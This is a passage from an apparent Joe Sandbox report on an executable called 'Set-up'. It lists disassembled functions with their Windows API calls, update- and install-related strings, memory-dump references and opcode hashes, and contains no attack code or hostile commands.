                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                  • String ID: ReadFile()
                                                                                                                                  • API String ID: 1948546556-1174911424
                                                                                                                                  • Opcode ID: 89d1ca83e9e8d73be12ff0fc0eddaa1b8e10a28a4b8e393baad01d9468568f6f
                                                                                                                                  • Instruction ID: a9b1fb01a0e53b9963a559616e60360484e49af87574bba08ff7c04c29445e25
                                                                                                                                  • Opcode Fuzzy Hash: 89d1ca83e9e8d73be12ff0fc0eddaa1b8e10a28a4b8e393baad01d9468568f6f
                                                                                                                                  • Instruction Fuzzy Hash: EB11A9362102099FC714DF58E845BAAB7E8EB55315F1041ABEC40D7310D7B2ACA5DBA1
                                                                                                                                  Function 058F9162 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 058F9253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindWindow
                                                                                                                                  • String ID: SQ$_]
                                                                                                                                  • API String ID: 134000473-3330144509
                                                                                                                                  • Opcode ID: 27c3f866bfc1e911dcc20d4ae910d2088e24c3aac21d5f5e20d59f42217e890c
                                                                                                                                  • Instruction ID: 2fdc5c6d7b36ce90a2ea84456be747c42b6f4826cfeeb33c46eac04db5859319
                                                                                                                                  • Opcode Fuzzy Hash: 27c3f866bfc1e911dcc20d4ae910d2088e24c3aac21d5f5e20d59f42217e890c
                                                                                                                                  • Instruction Fuzzy Hash: 0021BBB110D7808BE334DF21C9957EFBAE6AB88704F14882CE18ADB291DB744445CB02
                                                                                                                                  Function 058F9166 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,?,00000000), ref: 058F9253
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindWindow
                                                                                                                                  • String ID: SQ$_]
                                                                                                                                  • API String ID: 134000473-3330144509
                                                                                                                                  • Opcode ID: 4166df4e1f6b5f93f5779b49a61b34ee3c2a46db461badb521cdfb022f3c86ff
                                                                                                                                  • Instruction ID: ac6b0110fa7ff33812da4d3275f0f5498828eea4b14001204f349d34869e8b5a
                                                                                                                                  • Opcode Fuzzy Hash: 4166df4e1f6b5f93f5779b49a61b34ee3c2a46db461badb521cdfb022f3c86ff
                                                                                                                                  • Instruction Fuzzy Hash: C6218BB110D7808BE334DF25D9957EFFBE6AF88704F14882CE18A9B295DB744445CB02
                                                                                                                                  Function 0106FB50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0106FBEC
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: during $InstallState error 0x
                                                                                                                                  • API String ID: 3976011213-3843838528
                                                                                                                                  • Opcode ID: 0e519a4d3414ba5f435f81a78987e574f7f2c49160072928bd3113816a0cddb9
                                                                                                                                  • Instruction ID: 128741a7f2e2ec5bc7abca615dc7d0dcd563de08a849a003b97a3b82827a4db7
                                                                                                                                  • Opcode Fuzzy Hash: 0e519a4d3414ba5f435f81a78987e574f7f2c49160072928bd3113816a0cddb9
                                                                                                                                  • Instruction Fuzzy Hash: 03119071905248BBDB15DBA4DC12FEEBBA8EB04B04F10855DF524A7282DB769A048791
                                                                                                                                  Function 00E31580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Unknown, xrefs: 00E315DA
                                                                                                                                  • The status of the currently installed version is unknown because there has not been a recent, successful check for updates., xrefs: 00E315CB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: The status of the currently installed version is unknown because there has not been a recent, successful check for updates.$Unknown
                                                                                                                                  • API String ID: 0-2368558394
                                                                                                                                  • Opcode ID: 4ebcd3167cb6df68e9bad55b823dad69e30ee0097aff23f9e2984baa0fe26d68
                                                                                                                                  • Instruction ID: 7c4b07061723bfc12ff7fabab36657079f0ed488de3c541d1c6d853fbeb51937
                                                                                                                                  • Opcode Fuzzy Hash: 4ebcd3167cb6df68e9bad55b823dad69e30ee0097aff23f9e2984baa0fe26d68
                                                                                                                                  • Instruction Fuzzy Hash: 4711A3B0A05304DBEB14DF64DD06759BFF8EB01714F148269E4155B3C4DB799505CB91
                                                                                                                                  Function 00E86930 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<struct UpdateInfo>::push_back
                                                                                                                                  • API String ID: 0-2427261775
                                                                                                                                  • Opcode ID: a0031dea5b82dc87cc2828776d7d4fd1f250e447e9692ff0daebda99fc4703a4
                                                                                                                                  • Instruction ID: 129878d3f325c302d45a0f7ecc3db33ea73b6a37ab22379ed3ce2cc84c42d074
                                                                                                                                  • Opcode Fuzzy Hash: a0031dea5b82dc87cc2828776d7d4fd1f250e447e9692ff0daebda99fc4703a4
                                                                                                                                  • Instruction Fuzzy Hash: 7B01F9B1A44258AFD724DF54DC02B6AB7E8E704B20F00463EE814A77C0EBB619108790
                                                                                                                                  Function 011192D9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 011192E5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 011192F3
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::invalid_argument::invalid_argument
                                                                                                                                  • String ID: bad function call
                                                                                                                                  • API String ID: 4038826145-3612616537
                                                                                                                                  • Opcode ID: ca455b49324c7b933f6ff9b35dd68afcd2ae977f75163e8996757bc7c20b18b0
                                                                                                                                  • Instruction ID: d33fe746928355f63be9078b94811981ed8ca38254060803783dcee0b22c774a
                                                                                                                                  • Opcode Fuzzy Hash: ca455b49324c7b933f6ff9b35dd68afcd2ae977f75163e8996757bc7c20b18b0
                                                                                                                                  • Instruction Fuzzy Hash: 00C01239C0020C7BCF08B6A5D9A5C8CB7797E24504F8084786720A3048E7709618C685
                                                                                                                                  Function 00F06D70 Relevance: 5.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0000000C,460C02D8,00000000,00E7C2D7), ref: 00F06DAE
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06DD3
                                                                                                                                  • EnterCriticalSection.KERNEL32(0000000C), ref: 00F06DFA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06E1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                  • Opcode ID: 919dc44a8a5acfb1f0f0e40eef561fd87c04ec875fde82ea2632c41ebff17273
                                                                                                                                  • Instruction ID: d7e8d741db691a908467d3ac8d7f6588dd516a780cf477190fd1a858af201a04
                                                                                                                                  • Opcode Fuzzy Hash: 919dc44a8a5acfb1f0f0e40eef561fd87c04ec875fde82ea2632c41ebff17273
                                                                                                                                  • Instruction Fuzzy Hash: 3131AE7490064ADFCB24CF64C9887AEFFB8FF09324F20025AD815A7781D7786A58CB95
                                                                                                                                  Function 00E5F1D0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F208
                                                                                                                                    • Part of subcall function 00E5F120: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E5F158
                                                                                                                                    • Part of subcall function 00E5F120: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F1A8
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5F23A
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F275
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F287
                                                                                                                                    • Part of subcall function 00E651C0: SetConsoleCursorInfo.KERNEL32(?,?,460C02D8), ref: 00E65239
                                                                                                                                    • Part of subcall function 00E651C0: GetLastError.KERNEL32 ref: 00E65243
                                                                                                                                    • Part of subcall function 00E651C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E65287
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$ConsoleInfo$BufferCursorErrorException@8LastScreenThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2192776864-0
                                                                                                                                  • Opcode ID: 510411f6e952a504ce3ac481ed09cb0b44543d167deabac61b3786a756776b54
                                                                                                                                  • Instruction ID: 8e3dbe1dfd42a9493c2f975c5f8d6823a3616fa4e9bd9f98b46f9271ee9e239c
                                                                                                                                  • Opcode Fuzzy Hash: 510411f6e952a504ce3ac481ed09cb0b44543d167deabac61b3786a756776b54
                                                                                                                                  • Instruction Fuzzy Hash: 4D21A470904288DECB19DBA9C5097DDBFF8EF06708F10419DE820B7385C7B52A48CBA1